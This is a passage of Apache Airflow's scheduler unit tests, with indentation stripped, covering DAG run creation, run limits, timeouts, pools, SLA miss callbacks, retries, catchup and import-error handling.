scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
task_instances_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
task_instances_list = Mock()
# and schedule them in, so we can check how many
# tasks are put on the task_instances_list (should be one, not 3)
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
task_instances_list.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob(executor=self.null_exec)
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
task_instances_list = []
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
self.assertEqual(len(task_instances_list), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in task_instances_list:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
self.assertEquals(len(scheduler.executor.queued_tasks), 0, "Check test pre-condition")
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED, State.UP_FOR_RETRY),
session=session)
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor(do_update=False)
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler calls the sla miss callback
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta()})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
def test_scheduler_sla_miss_callback_invalid_sla(self):
"""
Test that the scheduler does not call the sla miss callback when
given an invalid sla
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
# Pass anything besides a timedelta object to the sla argument.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': None})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_sent_notification(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor(do_update=False)
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER, "..", "dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
executor=self.null_exec,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
